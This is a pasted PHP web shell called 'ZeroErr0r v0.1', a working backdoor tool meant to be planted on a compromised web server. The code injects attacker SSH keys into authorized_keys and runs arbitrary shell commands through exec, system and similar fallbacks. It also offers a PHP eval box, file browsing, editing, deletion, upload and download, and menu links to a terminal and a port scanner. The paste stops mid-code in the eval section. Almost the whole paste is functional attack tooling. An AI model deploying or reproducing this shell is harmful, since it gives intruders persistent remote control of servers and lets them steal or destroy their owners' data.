SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | session_start(); | |
3 | error_reporting(0); | |
4 | if (isset($_POST['password'])) { | |
5 | if (md5($_POST['password']) == '') { | |
6 | $_SESSION['password'] = $_POST['password']; | |
7 | header("Location: ?"); | |
8 | } else { | |
9 | header("Location: ?"); | |
10 | } | |
11 | } | |
12 | ||
13 | // ssh key injector | |
14 | if (isset($_POST['inject_key'])) { | |
15 | $key = $_POST['pub_key']; | |
16 | ||
17 | // TODO: make this method works on windows servers | |
18 | // this is only for linux server | |
19 | chdir($_SERVER['DOCUMENT_ROOT'] . "/.."); | |
20 | if (file_exists(getcwd() . "/.ssh")) { | |
21 | if (!is_writable((getcwd() . '/.ssh'))) { | |
22 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied")); | |
23 | die(); | |
24 | } | |
25 | } else { | |
26 | if (!is_writable(getcwd())) { | |
27 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied")); | |
28 | die(); | |
29 | } | |
30 | mkdir(getcwd() . "/.ssh"); | |
31 | } | |
32 | ||
33 | $key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+"); | |
34 | fwrite($key_file, $key); | |
35 | fclose($key_file); | |
36 | chdir($_SESSION['cd']); | |
37 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh key injected successfully!")); | |
38 | } | |
39 | ||
40 | function download($filename){ | |
41 | if(!empty($filename)){ | |
42 | // Specify file path. | |
43 | $path = ''; // '/uplods/' | |
44 | $download_file = $path.$filename; | |
45 | // Check file is exists on given path. | |
46 | if(file_exists($download_file)) { | |
47 | // Getting file extension. | |
48 | $extension = explode('.',$filename); | |
49 | $extension = $extension[count($extension)-1]; | |
50 | // For Gecko browsers | |
51 | header('Content-Transfer-Encoding: binary'); | |
52 | header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT'); | |
53 | // Supports for download resume | |
54 | header('Accept-Ranges: bytes'); | |
55 | // Calculate File size | |
56 | header('Content-Length: ' . filesize($download_file)); | |
57 | header('Content-Encoding: none'); | |
58 | // Change the mime type if the file is not PDF | |
59 | header('Content-Type: application/'.$extension); | |
60 | // Make the browser display the Save As dialog | |
61 | header('Content-Disposition: attachment; filename=' . $filename); | |
62 | readfile($download_file); | |
63 | exit; | |
64 | } | |
65 | else { | |
66 | header("Location: ?msg=" . base64_encode('File does not exists on given path')); | |
67 | } | |
68 | ||
69 | } | |
70 | } | |
71 | ||
72 | if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'download') { | |
73 | download($_GET['view']); | |
74 | } | |
75 | ||
76 | if (isset($_GET['action']) AND $_GET['action'] == 'logout') { | |
77 | session_destroy(); | |
78 | header("Location: ?"); | |
79 | die(); | |
80 | } | |
81 | ||
82 | ||
83 | function delete_directory($dirname) { | |
84 | if (is_dir($dirname)) | |
85 | $dir_handle = opendir($dirname); | |
86 | if (!$dir_handle) | |
87 | return false; | |
88 | while($file = readdir($dir_handle)) { | |
89 | if ($file != "." && $file != "..") { | |
90 | if (!is_dir($dirname."/".$file)) | |
91 | unlink($dirname."/".$file); | |
92 | else | |
93 | delete_directory($dirname.'/'.$file); | |
94 | } | |
95 | } | |
96 | closedir($dir_handle); | |
97 | rmdir($dirname); | |
98 | return true; | |
99 | } | |
100 | ||
101 | if (isset($_GET['cd'])) { | |
102 | $_SESSION['cd'] = base64_decode($_GET['cd']); | |
103 | } | |
104 | ||
105 | if (isset($_GET['rmdir'])) { | |
106 | $file = realpath(base64_decode($_GET['rmdir'])); | |
107 | if (file_exists($file)) { | |
108 | if (is_writable($file)) { | |
109 | delete_directory($file); | |
110 | header("Location: ?msg=" . base64_encode($file . " has been deleted!")); | |
111 | } else { | |
112 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
113 | } | |
114 | } | |
115 | } | |
116 | if (isset($_GET['rmfile'])) { | |
117 | $file = realpath(base64_decode($_GET['rmfile'])); | |
118 | if (file_exists($file)) { | |
119 | if (is_writable($file)) { | |
120 | unlink($file); | |
121 | header("Location: ?msg=" . base64_encode($file . " has been deleted!")); | |
122 | } else { | |
123 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
124 | } | |
125 | } | |
126 | } | |
127 | ||
128 | if (isset($_GET['multirmfile'])) { | |
129 | for ($i = 0; $i < intval($_GET['multirmfile']); $i++) { | |
130 | $file = realpath(base64_decode($_GET['rmfile' . $i])); | |
131 | if (file_exists($file)) { | |
132 | if (is_writable($file)) { | |
133 | if (is_dir($file)) { | |
134 | rmdir($file); | |
135 | } else { | |
136 | unlink($file); | |
137 | } | |
138 | header("Location: ?msg=" . base64_encode("selected file(s) has been deleted!")); | |
139 | } else { | |
140 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
141 | } | |
142 | } | |
143 | } | |
144 | } | |
145 | ||
146 | if (isset($_SESSION['cd'])) { | |
147 | chdir($_SESSION['cd']); | |
148 | } | |
149 | ||
150 | if (isset($_GET['to']) AND isset($_GET['from'])) { | |
151 | $from = base64_decode($_GET['from']); | |
152 | $to = $_GET['to']; | |
153 | ||
154 | if (is_writable($from)) { | |
155 | if (file_exists($from)) { | |
156 | rename($from, getcwd() . '/' . $to); | |
157 | header('Location: ?msg=' . base64_encode("file renamed successfully!")); | |
158 | } else { | |
159 | header("Location: ?msg=" . base64_encode("file doesn't exist")); | |
160 | } | |
161 | } else { | |
162 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
163 | } | |
164 | } | |
165 | ||
166 | function formatSizeUnits($bytes) { | |
167 | if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } | |
168 | elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } | |
169 | elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } | |
170 | elseif ($bytes > 1) { $bytes = $bytes . ' B'; } | |
171 | elseif ($bytes == 1) { $bytes = $bytes . ' B'; } | |
172 | else { $bytes = '0 B'; } | |
173 | ||
174 | return $bytes; | |
175 | } | |
176 | function formatPerms($perms) { | |
177 | switch ($perms & 0xF000) { | |
178 | case 0xC000: // socket | |
179 | $info = 's'; | |
180 | break; | |
181 | case 0xA000: // symbolic link | |
182 | $info = 'l'; | |
183 | break; | |
184 | case 0x8000: // regular | |
185 | $info = 'r'; | |
186 | break; | |
187 | case 0x6000: // block special | |
188 | $info = 'b'; | |
189 | break; | |
190 | case 0x4000: // directory | |
191 | $info = 'd'; | |
192 | break; | |
193 | case 0x2000: // character special | |
194 | $info = 'c'; | |
195 | break; | |
196 | case 0x1000: // FIFO pipe | |
197 | $info = 'p'; | |
198 | break; | |
199 | default: // unknown | |
200 | $info = 'u'; | |
201 | } | |
202 | ||
203 | // Owner | |
204 | $info .= (($perms & 0x0100) ? 'r' : '-'); | |
205 | $info .= (($perms & 0x0080) ? 'w' : '-'); | |
206 | $info .= (($perms & 0x0040) ? | |
207 | (($perms & 0x0800) ? 's' : 'x' ) : | |
208 | (($perms & 0x0800) ? 'S' : '-')); | |
209 | ||
210 | // Group | |
211 | $info .= (($perms & 0x0020) ? 'r' : '-'); | |
212 | $info .= (($perms & 0x0010) ? 'w' : '-'); | |
213 | $info .= (($perms & 0x0008) ? | |
214 | (($perms & 0x0400) ? 's' : 'x' ) : | |
215 | (($perms & 0x0400) ? 'S' : '-')); | |
216 | ||
217 | // World | |
218 | $info .= (($perms & 0x0004) ? 'r' : '-'); | |
219 | $info .= (($perms & 0x0002) ? 'w' : '-'); | |
220 | $info .= (($perms & 0x0001) ? | |
221 | (($perms & 0x0200) ? 't' : 'x' ) : | |
222 | (($perms & 0x0200) ? 'T' : '-')); | |
223 | ||
224 | return $info; | |
225 | } | |
226 | function modifiedDate($filename) { | |
227 | if (file_exists($filename)) { | |
228 | return date ("M-d-Y H:i:s", filemtime($filename)); | |
229 | } | |
230 | } | |
231 | ||
232 | function ex($in) { | |
233 | $out = ''; | |
234 | if(function_exists('exec')) { | |
235 | @exec($in,$out); | |
236 | $out = @join("\n",$out); | |
237 | }elseif(function_exists('passthru')) { | |
238 | ob_start(); | |
239 | @passthru($in); | |
240 | $out = ob_get_clean(); | |
241 | }elseif(function_exists('system')) { | |
242 | ob_start(); | |
243 | @system($in); | |
244 | $out = ob_get_clean(); | |
245 | }elseif(function_exists('shell_exec')) { | |
246 | $out = shell_exec($in); | |
247 | }elseif(is_resource($f = @popen($in,"r"))) { | |
248 | $out = ""; | |
249 | while(!@feof($f)) | |
250 | $out .= fread($f,1024); | |
251 | pclose($f); | |
252 | } | |
253 | return $out; | |
254 | } | |
255 | ||
256 | function which($p) { | |
257 | $path = ex('which '.$p); | |
258 | if(!empty($path)) | |
259 | return $path; | |
260 | return false; | |
261 | } | |
262 | ||
263 | if (isset($_POST['edit'])) { | |
264 | if (is_writable($_POST['dest'])) { | |
265 | $file = fopen($_POST['dest'], 'w'); | |
266 | fwrite($file, $_POST['content']); | |
267 | fclose($file); | |
268 | header('Location: ?msg=' . base64_encode("file saved!")); | |
269 | } else { | |
270 | header('Location: ?msg=' . base64_encode("permission denied!")); | |
271 | } | |
272 | } | |
273 | ||
274 | if (isset($_GET['touch']) AND isset($_GET['file'])) { | |
275 | if (is_writable(dirname(base64_decode($_GET['touch'])))) { | |
276 | $content = ""; | |
277 | $fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],"wb"); | |
278 | fwrite($fp,$content); | |
279 | fclose($fp); | |
280 | header("Location: ?msg=" . base64_encode($_GET['file'] . " has been created!")); | |
281 | } else { | |
282 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
283 | } | |
284 | } | |
285 | ||
286 | if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) { | |
287 | if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) { | |
288 | mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']); | |
289 | header("Location: ?msg=" . base64_encode($_GET['folder'] . " folder has been created!")); | |
290 | } else { | |
291 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
292 | } | |
293 | } | |
294 | ||
295 | if (isset($_POST['upload'])) { | |
296 | if (is_writable($_POST['path'])) { | |
297 | $files = @$_FILES["files"]; | |
298 | $fullpath = $_POST['path'] . "/" . $files["name"]; | |
299 | ||
300 | // if (file_exists($fullpath)) { | |
301 | // header("Location: ?msg=" . base64_encode("file already exist!")); | |
302 | // die(); | |
303 | // } | |
304 | ||
305 | if ($files["name"] != '') { | |
306 | if (move_uploaded_file($files['tmp_name'], $fullpath)) { | |
307 | header("Location: ?msg=" . base64_encode("file uploaded to $fullpath")); | |
308 | } else { | |
309 | header("Location: ?msg=" . base64_encode("an error occured!")); | |
310 | } | |
311 | } | |
312 | } else { | |
313 | header("Location: ?msg=" . base64_encode(base64_decode('permission denied!'))); | |
314 | } | |
315 | } | |
316 | ||
317 | if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) { | |
318 | header("Location: ?cd=" . base64_encode($_POST['qpath'])); | |
319 | } | |
320 | ||
321 | ||
322 | ||
323 | if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == 'zip') { | |
324 | $zip = new ZipArchive(); | |
325 | chdir($_SESSION['cd']); | |
326 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { | |
327 | $tmp = explode('\\', getcwd()); | |
328 | } else { | |
329 | $tmp = explode('/', getcwd()); | |
330 | } | |
331 | ||
332 | if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchive::CREATE) === TRUE) { | |
333 | for ($i = 0; $i < intval($_GET['numfiles']); $i++) { | |
334 | // $zip->addFromString(basename(getcwd() . '/cx.txt'), file_get_contents(getcwd() . '/cx.txt')); | |
335 | $file = base64_decode($_GET['file' . $i]); | |
336 | if (!is_dir($file)) { | |
337 | $zip->addFile(basename($file)); | |
338 | } | |
339 | } | |
340 | $zip->close(); | |
341 | ||
342 | header("Location: ?msg=" . base64_encode("selected files has been compressed and downloaded.")); | |
343 | } else { | |
344 | echo "Failed!"; | |
345 | header("Location: ?msg=" . base64_encode("failed to create a zip file")); | |
346 | } | |
347 | } | |
348 | ||
349 | ?> | |
350 | ||
351 | <!DOCTYPE html> | |
352 | <html> | |
353 | <head> | |
354 | <meta charset="utf-8"> | |
355 | <title>- ZerroErr0r v0.1</title> | |
356 | <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> | |
357 | <style type="text/css"> | |
358 | .hljs{display:block;overflow-x:auto;padding:.5em;background:#071414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hljs-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-string,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-built_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hljs-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selector-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-link{text-decoration:underline} | |
359 | </style> | |
360 | ||
361 | <script type="text/javascript"> | |
362 | window.addEventListener('load', function() { | |
363 | var boxes = document.getElementsByClassName('box'); | |
364 | for (var i = 0; i < boxes.length; i++) { | |
365 | boxes[i].innerHTML += "<span class='c1'></span><span class='c2'></span><span class='c3'></span><span class='c4'></span>"; | |
366 | } | |
367 | }, false); | |
368 | </script> | |
369 | ||
370 | <style type="text/css"> | |
371 | @import url(https://fonts.googleapis.com/css?family=Electrolize);body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transition:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:inline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,footer{text-align:right}body{background-color:#071414;font-family:Electrolize,monospace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}header .logo{float:left;position:relative;top:3px}header .info{float:right;text-transform:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:20px;border:1px solid #E3052B;}section .content{padding:20px}section .title{background-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section table{width:100%}section table td{padding:5px 15px}section table .td_head td{padding:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:#1A272E}section table tr:first-child:hover{background-color:transparent}section a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:center;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}form textarea{width:100%;display:block;border:none;height:500px;background-color:transparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form select{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:transparent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#AAA}form input[type=text]{border:none;background-color:transparent;font-size:1.1rem;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E3052B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.dark_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-webkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;background-color:#1A272E}#login input{background-color:transparent;border:1px solid #E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{margin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#AAA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E3052B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box .c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; background-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; right: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; left: -2px; }header { position: relative; }header .logo p, header .logo{font-weight: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margin: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-color: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}select {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space: pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-wrap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 20px;border-bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu button{outline:none;border: 1px solid #E3052B;background-color: transparent;color: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: 'Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{background-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_select{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #85001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:hover {background-color: transparent;}.off{display: none;}.port_scanner input[type='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width: 100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparent;}.port_scanner td {padding: 3px 0;} | |
372 | </style> | |
373 | ||
374 | <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highlight.min.js"></script> | |
375 | </head> | |
376 | <body> | |
377 | <?php if (!isset($_SESSION['password'])) { ?> | |
378 | ||
379 | <form action="" method="post" id="login" class="box"> | |
380 | <p class="title">PASSWORD</p><br> | |
381 | <div class="content"> | |
382 | <input type="text" name="password" style="-webkit-text-security: square;font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;" autocomplete="off" spellcheck="false" autofocus> | |
383 | <input type="submit" name="login" value="GET IN!" style="font-family: 'Electrolize', monospace;font-size: 1rem;"> | |
384 | </div> | |
385 | </form> | |
386 | ||
387 | <?php die(); } ?> | |
388 | ||
389 | ||
390 | <header class="clearfix box"> | |
391 | <div class="logo"> | |
392 | <p>ZeroErr0r <span>v0.1</span></p> | |
393 | </div> | |
394 | <div class="info"> | |
395 | Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?> | |
396 | </div> | |
397 | </header> | |
398 | <nav> | |
399 | <ul> | |
400 | <li><a href="?">explorer</a></li> | |
401 | <li><a href="?view=evaluate">evaluate</a></li> | |
402 | <li><a href="?view=info">info</a></li> | |
403 | <li><a href="?view=terminal">terminal</a></li> | |
404 | <li><a href="?view=port_scanner">port scanner</a></li> | |
405 | <li><a href="?view=injector">injector</a></li> | |
406 | <li><a href="?view=database">database</a></li> | |
407 | <li><a href="?view=networking">networking</a></li> | |
408 | <li><a href="?action=logout"><i class="fa fa-sign-out"></i> logout</a></li> | |
409 | </ul> | |
410 | </nav> | |
411 | <section class="box"> | |
412 | <?php if (isset($_GET['msg'])) { ?> | |
413 | <div class="error"><?php echo base64_decode($_GET['msg']) ?></div> | |
414 | <?php } ?> | |
415 | ||
416 | <script> | |
417 | function showAction() { | |
418 | var s = document.getElementsByClassName('file_select'); | |
419 | var m = document.getElementsByClassName('action_menu')[0]; | |
420 | for (var i = 0; i < s.length; i++) { | |
421 | if (s[i].checked) { | |
422 | m.style.display = 'block'; | |
423 | break; | |
424 | } else { | |
425 | m.style.display = 'none'; | |
426 | } | |
427 | } | |
428 | } | |
429 | </script> | |
430 | ||
431 | <div class="action_menu"> | |
432 | <button onclick="filesDelete()"><i class="fa fa-trash"></i> Delete</button> | |
433 | <button onclick="filesCompress()"><i class="fa fa-download"></i> Compress</button> | |
434 | </div> | |
435 | ||
436 | <!-- SUB_MENU --> | |
437 | <?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?> | |
438 | <div class="view_action"> | |
439 | <a href="?view=<?php echo $_GET['view'] ?>&action=edit"><button><i class="fa fa-pencil"></i> Edit</button></a> | |
440 | <a href="?view=<?php echo $_GET['view'] ?>&action=download"><button><i class="fa fa-download"></i> Download</button></a> | |
441 | <a href="?rmfile=<?php echo base64_encode($_GET['view']) ?>"><button><i class="fa fa-trash"></i> Delete</button></a> | |
442 | <a href="?"><button><i class="fa fa-close"></i> Close</button></a> | |
443 | </div> | |
444 | <?php } ?> | |
445 | <?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?> | |
446 | <div class="view_action"> | |
447 | <a href="?view=<?php echo $_GET['view'] ?>"><button><i class="fa fa-asterisk"></i> Basic Injector</button></a> | |
448 | <a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><button><i class="fa fa-exchange"></i> SSH Injector</button></a> | |
449 | </div> | |
450 | <?php } ?> | |
451 | ||
452 | <form action="" method="POST"> | |
453 | <input class="title" value="<?php echo getcwd(); ?>" name="qpath" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-width: 2px;"> | |
454 | </form> | |
455 | <div class="content"> | |
456 | <?php if (!isset($_GET['view'])) { ?> | |
457 | <table> | |
458 | <tr class="td_head"> | |
459 | <td>name</td> | |
460 | <td>size</td> | |
461 | <td>permissions</td> | |
462 | <td>modified</td> | |
463 | <td>action</td> | |
464 | </tr> | |
465 | <?php | |
466 | // echo getcwd() . "<br>"; | |
467 | // chdir(".."); | |
468 | // echo getcwd(); | |
469 | $directories = array(); | |
470 | $files_list = array(); | |
471 | if ($handle = opendir('.')) { | |
472 | ||
473 | while (false !== ($entry = readdir($handle))) { | |
474 | ||
475 | if (is_dir($entry)) { | |
476 | $directories[] = $entry; | |
477 | } else { | |
478 | $files_list[] = $entry; | |
479 | } | |
480 | } | |
481 | ||
482 | closedir($handle); | |
483 | } | |
484 | asort($directories); | |
485 | ||
486 | foreach ($directories as $dir) { | |
487 | if ($dir != "." && $dir != "..") { | |
488 | $size = "Dir"; | |
489 | $perms = formatPerms(fileperms($dir)); | |
490 | $modified = modifiedDate($dir); | |
491 | $link = "?cd=" . base64_encode(getcwd() . "/" . $dir); | |
492 | $del = "?rmdir=" . base64_encode(getcwd() . "/" . $dir); | |
493 | $down_path = getcwd() . "/" . $dir; | |
494 | $path = base64_encode($down_path); | |
495 | // $upload_path = realpath(dirname(__FILE__) . $dir); | |
496 | ||
497 | echo "<tr>"; | |
498 | echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>"; | |
499 | echo "<td>$size</td>"; | |
500 | echo "<td>$perms</td>"; | |
501 | echo "<td>$modified</td>"; | |
502 | echo "<td class='action'><a href='#' onclick='rename(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action=upload'>upl</a></td>"; | |
503 | echo "</tr>"; | |
504 | } else { | |
505 | $size = "Link"; | |
506 | $perms = formatPerms(fileperms($dir)); | |
507 | $modified = modifiedDate($dir); | |
508 | $down_path = getcwd() . "/" . $dir; | |
509 | if ($dir == '..'){ | |
510 | $link = "?cd=" . base64_encode(getcwd() . "/.."); | |
511 | $touch_path = base64_encode('..'); | |
512 | $mkdir_path = base64_encode('..'); | |
513 | $upload_dir = '..'; | |
514 | } else { | |
515 | $link = "?cd=" . base64_encode(getcwd()); | |
516 | $touch_path = base64_encode($down_path); | |
517 | $mkdir_path = base64_encode($down_path); | |
518 | $upload_dir = getcwd(); | |
519 | } | |
520 | ||
521 | echo "<tr>"; | |
522 | echo "<td><input type='checkbox' style='opacity:0;margin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>"; | |
523 | echo "<td>$size</td>"; | |
524 | echo "<td>$perms</td>"; | |
525 | echo "<td>$modified</td>"; | |
526 | echo "<td class='action'><a href='?view=$upload_dir&action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a> - <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>"; | |
527 | echo "</tr>"; | |
528 | } | |
529 | } | |
530 | ||
531 | foreach ($files_list as $file) { | |
532 | // if ($file != "." && $file != "..") { | |
533 | $size = formatSizeUnits(filesize($file)); | |
534 | $perms = formatPerms(fileperms($file)); | |
535 | $modified = modifiedDate($file); | |
536 | $del = "?rmfile=" . base64_encode(getcwd() . "/" . $file); | |
537 | // $down_path = realpath(getcwd() . "/" . $file); | |
538 | $path = getcwd() . "/" . $file; | |
539 | $rename_path = base64_encode($down_path); | |
540 | $isimg = @is_array(getimagesize($file)); | |
541 | ||
542 | // echo "<p>$file <b>" . formatSizeUnits(filesize($file)) . "</b></p>"; | |
543 | echo "<tr>"; | |
544 | echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=display&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>"; | |
545 | echo "<td>$size</td>"; | |
546 | echo "<td>$perms</td>"; | |
547 | echo "<td>$modified</td>"; | |
548 | echo "<td class='action'><a href='?view=$path&action=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>"; | |
549 | echo "</tr>"; | |
550 | // } | |
551 | } | |
552 | ||
553 | ?> | |
554 | </table> | |
555 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?> | |
556 | <?php $path_info = pathinfo($_GET['view']); ?> | |
557 | ||
558 | <pre><code class="<?php echo $path_info['extension'] ?>"><?php | |
559 | if (file_exists($_GET['view'])) { | |
560 | if ($_GET['img'] === '1') { | |
561 | $image = (strpos($_GET['view'], $_SERVER['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#', 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view']; | |
562 | // Read image path, convert to base64 encoding | |
563 | $imageData = base64_encode(file_get_contents($image)); | |
564 | ||
565 | // Format the image SRC: data:{mime};base64,{data}; | |
566 | $src = 'data: '. pathinfo($image, PATHINFO_EXTENSION) .';base64,'.$imageData; | |
567 | ||
568 | // Echo out a sample image | |
569 | echo '<img src="' . $src . '">'; | |
570 | } else { | |
571 | $file = fopen($_GET['view'], 'r'); | |
572 | if (filesize($_GET['view']) > 0) | |
573 | echo htmlspecialchars(fread($file, filesize($_GET['view']))); | |
574 | else | |
575 | echo "Empty"; | |
576 | fclose($file); | |
577 | } | |
578 | } | |
579 | ?></code></pre> | |
580 | ||
581 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'edit') { ?> | |
582 | ||
583 | <?php | |
584 | $file = fopen($_GET['view'], 'r'); | |
585 | if (filesize($_GET['view']) > 0) | |
586 | $content = htmlspecialchars(fread($file, filesize($_GET['view']))); | |
587 | else | |
588 | $content = ""; | |
589 | fclose($file); | |
590 | ?> | |
591 | ||
592 | <form action="" method="post"> | |
593 | <textarea name="content" spellcheck="false" autofocus><?php echo $content ?></textarea> | |
594 | <input type="hidden" name="dest" value="<?php echo $_GET['view'] ?>"> | |
595 | <input type="submit" name="edit" value="Save!"> | |
596 | </form> | |
597 | ||
598 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'upload') { ?> | |
599 | ||
600 | <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;"> | |
601 | <p style="margin: 0;font-size: 1.2rem;">Local File Upload</p> | |
602 | <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>"> | |
603 | <input type="file" name="files"> | |
604 | <input type="submit" name="upload" value="Upload!"> | |
605 | </form> | |
606 | <br><br> | |
607 | <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;"> | |
608 | <p style="margin: 0;font-size: 1.2rem;">Remote File Upload</p> | |
609 | <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>"> | |
610 | <input type="text" name="remote_file" placeholder="Remote File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relative;top:-1px; width: 200px;"> | |
611 | <input type="submit" name="remote_upload" value="Upload!"> | |
612 | </form> | |
613 | ||
614 | <!-- EVALUATE --> | |
615 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'evaluate') { ?> | |
616 | <form action="?view=evaluate" method="post"> | |
617 | <textarea name="eval_code" spellcheck="false" style="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_POST['eval_code']; } ?></textarea> | |
618 | <input type="submit" name="eval" value="Go!"> | |
619 | <select name="language"> | |
620 | <option value="php">php</option> | |
621 | <!-- <option value="python">python</option> | |
622 | <option value="perl">perl</option> | |
623 | <option value="nodejs">nodejs</option> | |
624 | <option value="ruby">ruby</option> --> | |
625 | </select> | |
626 | </form> | |
627 | <?php | |
